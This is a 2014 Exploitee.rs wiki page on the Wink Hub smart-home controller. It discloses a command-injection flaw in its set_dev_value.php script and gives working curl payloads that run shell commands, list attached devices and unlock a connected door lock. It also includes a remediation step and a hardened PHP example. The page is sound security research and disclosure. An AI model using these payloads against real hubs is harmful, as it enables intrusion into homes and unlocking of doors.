Wink Hub

From Exploitee.rs
Revision as of 10:40, 17 August 2014 by Zenofex (talk | contribs)

"Although the information we release has been verified and shown to work to the best of our knowledge, we can't be held accountable for bricked devices or roots gone wrong."


This page will be dedicated to a general overview, descriptions, and information related to the Wink Hub.

Purchase

Buying devices is expensive and, in a lot of cases, our testing leads to bricked equipment. If you would like to help support our group, site, and research, please use one of the links below to purchase your next device. Purchase the Wink Hub at Amazon

Disassembly

UART

The pin-out for UART can be found in the image below.

set_dev_value.php Command Execution

The Wink Hub runs a web server, and that server includes a script that allows remote command execution. The PHP code for this script can be seen in the photo below.

source code of /set_dev_value.php vulnerability

As you can see, the "nodeId" and "attrId" values are used in the sudo command string that is built and then passed to the PHP "passthru()" call. This allows us to execute commands by simply posting a command as either "nodeId" or "attrId" using any shell command format (";;", "$()", "|", "``").

Example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;COMMAND-HERE;"
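The root cause described above, as an added example (not the Wink Hub's script and not Exploitee.rs code): a constructed stand-in for the string-concatenation pattern beside a hardened form that validates both parameters before any command is built. The helper path, the function names and the assumption that both IDs are short decimal integers are hypothetical.

```php
<?php
// Added example: constructed stand-in, not the Wink Hub's actual source.
// HELPER is a hypothetical placeholder for whatever the real script runs via sudo.
const HELPER = '/usr/local/bin/example-helper';

// Pattern the page describes: request values concatenated into a shell string
// that is later handed to passthru(). Nothing here executes; it only builds text.
function build_command_unsafe(string $nodeId, string $attrId): string
{
    return 'sudo ' . HELPER . ' ' . $nodeId . ' ' . $attrId;
}

// Allow-list validation (assumption: IDs are 1 to 5 decimal digits).
// ctype_digit() rejects signs, whitespace and every shell metacharacter.
function parse_id(string $raw): ?int
{
    if ($raw === '' || strlen($raw) > 5 || !ctype_digit($raw)) {
        return null;
    }
    return (int) $raw;
}

// Hardened form: validate first, then quote each argument as defence in depth.
// Returns null when either value is invalid; the handler should answer HTTP 400.
function build_command_safe(string $nodeId, string $attrId): ?string
{
    $node = parse_id($nodeId);
    $attr = parse_id($attrId);
    if ($node === null || $attr === null) {
        return null;
    }
    return 'sudo ' . HELPER . ' '
        . escapeshellarg((string) $node) . ' '
        . escapeshellarg((string) $attr);
}

// Constructed inputs: one valid ID plus the four metacharacter forms the page lists.
$samples = ['10', ';COMMAND;', '$(COMMAND)', 'a|COMMAND', '`COMMAND`'];
foreach ($samples as $s) {
    echo 'input:    ', $s, "\n";
    echo 'unsafe:   ', build_command_unsafe('1', $s), "\n";
    echo 'hardened: ', build_command_safe('1', $s) ?? 'rejected, respond 400', "\n\n";
}
```

Run with the PHP CLI; only the first sample yields a command in the hardened form, while the unsafe builder passes every sample through to the shell string unchanged.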

Accessing Peripherals

Accessing peripherals attached to the device can be accomplished using the "/usr/sbin/aprontest" binary.

This binary is capable of listing all the attached peripherals as well as the peripheral states and state types.

For example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -l;"
Found 1 devices in database...
MASTERID |     INTERCONNECT |                         USERNAME
       1 |            ZWAVE |      New SECURE_KEYPAD_DOOR_LOCK

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;"
Generic/Specific device types: 0x40/0x03
Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044
Device has 1 attributes...
New SECURE_KEYPAD_DOOR_LOCK
ATTRIBUTE |               DESCRIPTION |   TYPE | MODE |          GET |          SET
       10 |               Lock_Unlock |   BOOL |  R/W |         TRUE |         TRUE

Above you can see us querying the Wink Hub through the bug in the "set_dev_value" PHP script to list the attached devices. We then use the "MASTERID" in the second query to find out exactly how to communicate with the attached peripheral.

Using the same "aprontest" binary, we can then manipulate the state of the attached device.

For example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -t 10 -u -v FALSE;"
Update device with master ID 1, setting value FALSE
Update callback: Status 0 on updating master ID: 1

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;"
Generic/Specific device types: 0x40/0x03
Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044
Device has 1 attributes...
New SECURE_KEYPAD_DOOR_LOCK
ATTRIBUTE |               DESCRIPTION |   TYPE | MODE |          GET |          SET
       10 |               Lock_Unlock |   BOOL |  R/W |        FALSE |        FALSE

The above example first sets the Lock_Unlock state to "FALSE", which unlocks the door lock. Then we query the device status again and confirm it is now "FALSE".

Demo

aprontest Syntax

Usage: aprontest [OPTION]...
Send commands and list information about connected devices

Operations:
  -a		Add a new home automation device
  -n		Manually add a home automation device to the database only.  USE WITH CAUTION.
		Only supports zigbee at this time.
  -d		Delete a home automation device
  -f		Force delete a home automation device from the database only.  USE WITH CAUTION.
		Only supports zigbee at this time.
  -u		Update the state of a home automation device with a new value
  -e		Force a refresh of a home automation device
  -g		Set a generic callback for a radio for one minute of radio
		testing
  -l		List general information about automation devices, or specific
		information about one device
  --set-name	Set user-readable name for a device

Other Options:
  -r <radio>	Specify a radio for an Add Device or Generic Callback operation.
		One of lutron, zwave, zigbee, kidde
  -m <id>	Specify a master device ID for a Delete, Update, Refresh, or
		List operation
  -t <id>	Specify an attribute ID for an Update operation
  -v <value>	Specify a new value to set for an Update operation

Kidde Specific Operations:
  -k <ID>	Set Kidde system ID

Z-Wave Specific Operations:
  --zwave_controller_reset	Reset the zwave controller. USE WITH CAUTION.
				Existing z-wave network will be lost.
  --zwave_remove_failed		Remove a failed zwave device. 
  --zwave_replace_failed	Replace a failed zwave device.
  --zwave_learn_mode		Enter Learn Mode on the Zwave Controller.
  --zwave_controller_shift	Hand off control to another (new) Zwave controller.
  --zwave_exclusion_mode	Enter Exclusion Mode on the Zwave Controller.

Lutron Specific Operations:
  --lutron_pico_add <dimmerMasterId>	Add dimmerMasterId to the control list for the pico controller with masterId set via -m
  --lutron_pico_del <dimmerMasterId>	Delete dimmerMasterId from the control list for the pico controller with masterId set via -m

Fixing "set_dev_value.php" Bug

This script isn't actually used for anything and can be removed or moved. This can be done by using the original bug to move the script that contains it.

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;mv /var/www/set_dev_value.php /var/www/set_dev_value.php.txt;"